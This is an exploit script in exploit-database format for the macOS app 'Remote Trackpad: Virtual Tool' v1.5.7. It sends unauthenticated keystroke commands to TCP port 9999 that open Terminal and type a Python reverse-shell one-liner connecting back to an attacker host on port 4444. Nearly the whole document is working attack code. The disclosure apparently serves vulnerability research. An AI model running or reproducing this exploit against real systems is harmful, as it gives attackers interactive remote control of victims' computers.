# Exploit Title: Remote Trackpad: Virtual Tool v1.5.7 - Remote Code
Execution
# Date: 25/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://helperix.com/
# Software Link:
https://apps.apple.com/us/app/remote-trackpad-virtual-tool/id1572422325
# Version: 1.5.7
# Tested on: macOS 14.4 Sonoma


'''
Description:

"Remote Trackpad: Virtual Tool" v1.5.7  is vulnerable to unauthenticated
Remote Code Execution (RCE) via TCP port 9999. An attacker on the same
network can inject simulated keyboard input, allowing arbitrary command
execution without user interaction or authentication.

'''


import socket
import time


ip = "192.168.8.101"
port = 9999
LHOST = "192.168.8.100"
LPORT = 4444



commands = [
    '{"value":"[SPOTLIGHT]"}|\n',
    '{"value":"terminal"}|\n',
    '{"value":"[ENTER]"}|\n',
    f'{{"value":"python3 -c \\"import
socket,subprocess,os;s=socket.socket();s.connect((\\\\\\"{LHOST}\\\\\\",{LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\\\\"/bin/bash\\\\\\",\\\\\\"-i\\\\\\"])
\\""}}|',

    '{"value":"[ENTER]"}|\n',
]


try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))

    time.sleep(0.5)

    for cmd in commands:
        s.sendall(cmd.encode())
        time.sleep(2)

    time.sleep(2)

    s.close()
    print("Commands sent successfully")
except Exception as e:
    print(f"Error: {e}")